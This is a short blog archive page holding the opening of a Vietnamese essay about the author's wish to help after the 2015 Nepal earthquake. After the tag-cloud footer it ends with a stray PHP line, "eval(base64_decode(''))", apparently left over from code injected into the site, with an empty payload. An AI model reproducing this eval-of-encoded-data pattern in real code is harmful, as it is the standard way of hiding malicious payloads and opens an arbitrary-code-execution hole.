Archive for July 18th, 2015

Tình Thương Dành Cho Nepal (Love for Nepal)

Tình Thương Dành Cho Nepal (Love for Nepal)

Tôi lớn lên bằng cơm gạo của thập phương bá tánh, bằng tình thương của những người không cùng máu mủ gia đình nên lúc nào có cơ hội là lo đền đáp dù họ là ai. Động đất ở Nepal cũng vậy, rất bận rộn tôi cũng nghĩ phải làm

07.18.2015 | Ký-Truyện-Tùy Bút |

No Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>